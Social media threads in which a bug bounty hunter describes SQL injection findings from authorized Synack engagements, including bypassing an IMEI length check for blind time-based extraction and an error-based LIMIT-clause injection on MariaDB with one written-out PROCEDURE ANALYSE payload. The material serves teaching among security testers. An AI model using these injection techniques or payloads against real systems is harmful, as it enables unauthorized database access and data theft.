As of today I passed half million milestone on @SynackRedTeam with 200k of it on last 90 days. So far this month about to catch previous one too, we will see what is going to happen in next 10 days :). #bugbounty#bugbountytips
Almost all my bugs this month was SQLis again. I'll try to give another example from the unique ones.
One of the targets was having SQLi on some weird endpoint. It was expecting XML data but looks like it was looking for "xml" as parameter.
I started to send some XML data via it. Application was giving error the each tag I used but for one of them it gave not string couldn't be parsed error.
After then I started to fuzz for attributes and find out IMEI was looked one, however any value I tried was giving error again for Invalid IMEI value.
I looked around on the web and located some data send for the target app and used the IMEI value from there. Application stopped giving error but looks like it was vulnerable to SQL on the same param.
What it looked like developer was parsing first 15 characters and checking if it was valid IMEI then processing entire payload.
However this was full blind SQLi so, used time based payloads and able to extract data. I hope this will be helpful for all others to and showing do not give up on the target.
• • •
Missing some Tweet in this thread? You can try to
force a refresh
On recent engagements to the on program on @SynackRedTeam, I find out that target had error based SQL injection on LIMIT clause, it appears that DBMS was MariaDB 10.4.13 so it was limiting options to be used on the injection. #bugbountytips#bugbounty 1/5
Only way to exploit the vulnerability was using PROCEDURE ANALYSE on the injection point. However we were not able to use subqueries inside analyse because it's not allowed. So our options were limited to fetch stuff like database(), user() etc. 2/5
Payload for injection was like this 1+procedure+analyse(extractvalue(rand(),version()),1). However this will only allow us to retrieve version of the DBMS, then I started to check which other functions are available to use with in permissions of the current user. 3/5